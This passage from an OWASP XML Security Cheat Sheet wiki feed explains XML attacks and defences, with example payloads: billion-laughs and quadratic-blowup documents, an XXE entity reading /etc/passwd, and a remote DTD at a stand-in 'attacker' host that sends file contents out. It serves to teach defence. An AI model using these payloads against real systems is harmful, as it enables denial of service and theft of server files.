The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) number of &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements. This is a common finding, since developers do not normally want to restrict the maximum number of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large number of elements to be processed. Since computational resources are limited, the consequences should be analyzed, and a maximum number should eventually be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
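&lt;br /&gt;
As a minimal sketch of such a limit, the &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; element declaration could carry an explicit bound. The value 1000 is an arbitrary assumption; an appropriate number depends on what the application can actually process:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''1000'''&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:all&amp;gt;&lt;br /&gt;
    &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;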
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
A server may need only about a second to process a 1 GB XML document, so sending one might not be worth considering as an attack. Instead, an attacker looks for ways to minimize the CPU and traffic needed to generate the attack relative to the CPU and traffic the server spends handling the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;soapenv:Envelope xmlns:soapenv=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot; xmlns:ext=&amp;quot;http://com/ibm/was/wssample/sei/echo/b2b/external&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;soapenv:Header '''largename1'''=&amp;quot;'''largevalue'''&amp;quot; '''largename2'''=&amp;quot;'''largevalue2'''&amp;quot; '''largename3'''=&amp;quot;'''largevalue3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''file''' SYSTEM &amp;quot;'''http://attacker/huge.xml'''&amp;quot; &amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;file;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available on the same host, whether or not the schemas are embedded in the same XML document.&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the &amp;lt;tt&amp;gt;note&amp;lt;/tt&amp;gt; element could be removed or altered, allowing any type of data to be sent to the server. Furthermore, if the server processes external entities, the attacker could use the schema, for example, to read files from the server. This type of schema only serves as a suggestion for sending a document; to be used safely, it must include a way to check the integrity of the embedded schema.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
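&lt;br /&gt;
For illustration only, the following hypothetical variant shows how an attacker who controls the document could relax the embedded DTD from the example above. Declaring &amp;lt;tt&amp;gt;note&amp;lt;/tt&amp;gt; with the content model &amp;lt;tt&amp;gt;ANY&amp;lt;/tt&amp;gt; lets the declared child elements and text appear in any order and number, so the document below would still be expected to validate:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note '''ANY'''&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Arbitrary content&amp;lt;/body&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;More arbitrary content&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;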
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''note.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 -rw-rw-'''rw-'''  1 user  staff  743 Jan 15 12:32 '''note.dtd'''&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML document or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text, so an attacker able to intercept the connection could sniff the traffic and modify the schema before it reaches the end user:&lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''http'''://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy.&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses.&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like https://example.com/note.dtd. In a normal scenario, example.com resolves to the IP 1.1.1.1:&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address 1.1.1.1&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker (2.2.2.2):&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address '''2.2.2.2'''&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may actually be retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
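When the definition of an entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; refers to another entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is in turn defined in terms of entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, the DTD describes a circular reference between entities. The XML specification forbids such recursion as a well-formedness constraint, so a conforming parser must report a fatal error; a parser that fails to detect the cycle may loop or exhaust its resources:&lt;br /&gt;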
 &amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;A&amp;gt;'''&amp;amp;A;'''&amp;lt;/A&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n^2)). The following attack expands to 100,000*100,000 = 10^10 characters in memory:&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(100,000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(100,000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the nested entities included within the following code, the application will start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; is resolved as the 10 &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt; entities it references; each of these is then resolved as 10 &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; entities, and so on. In the end, &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; expands to 10^9 (1,000,000,000) copies of the string &amp;lt;tt&amp;gt;LOL&amp;lt;/tt&amp;gt;, or 3*10^9 (3,000,000,000) characters. Parsing them will exhaust CPU and/or memory, which could make the parser crash.&lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:Envelope [&lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:Envelope ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:Envelope entityReference CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;SOAP:Envelope entityReference=&amp;quot;&amp;amp;LOL9;&amp;quot; xmlns:SOAP=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAP:Body&amp;gt;&lt;br /&gt;
    &amp;lt;keyword xmlns=&amp;quot;urn:parasoft:ws:store&amp;quot;&amp;gt;foo&amp;lt;/keyword&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:Body&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:Envelope&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt; whose replacement text is the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;; it will be expanded within the &amp;lt;tt&amp;gt;root&amp;lt;/tt&amp;gt; element. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema that makes the server retrieve remote resources, for example a file served over HTTP, HTTPS, or FTP. SSRF has been used to retrieve remote files, to prove an XXE when the file cannot be reflected back, and to perform port scanning or brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY % xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allow for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt;, which loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt;, which loads a remote DTD. The remote DTD should contain something like this:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information obtained from a port scan will depend on the type of implementation. Responses can be classified as follows, ranked from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
This is the simplest and least common scenario: with complete disclosure, you receive the complete responses from the server being queried, so you can clearly see what is going on. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports, depending on the schema and the underlying implementation. If timeouts occur when trying to connect to a closed port (which may take one minute), while the response when connecting to an open port is very quick (one second, for example), the difference between open and closed ports becomes quite clear.&lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host, then analyze the average time for each port to determine its status. This type of attack will be difficult to accomplish in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
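&lt;br /&gt;
To make the structure of such a URI explicit, the following sketch splits the example with &amp;lt;tt&amp;gt;urlsplit&amp;lt;/tt&amp;gt; from Python's standard &amp;lt;tt&amp;gt;urllib.parse&amp;lt;/tt&amp;gt; module. It only parses the string and sends nothing over the network; the scheme &amp;lt;tt&amp;gt;foo&amp;lt;/tt&amp;gt; is the placeholder from the example.&lt;br /&gt;
```python
from urllib.parse import urlsplit

# The URI from the example above; "foo" is a placeholder scheme.
uri = "foo://username:password@example.com:8080/"

parts = urlsplit(uri)
print(parts.scheme)                # the scheme
print(parts.username)              # first half of the user information
print(parts.password)              # second half of the user information
print(parts.hostname, parts.port)  # target host and port
```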
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224436</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224436"/>
				<updated>2016-12-21T20:23:11Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
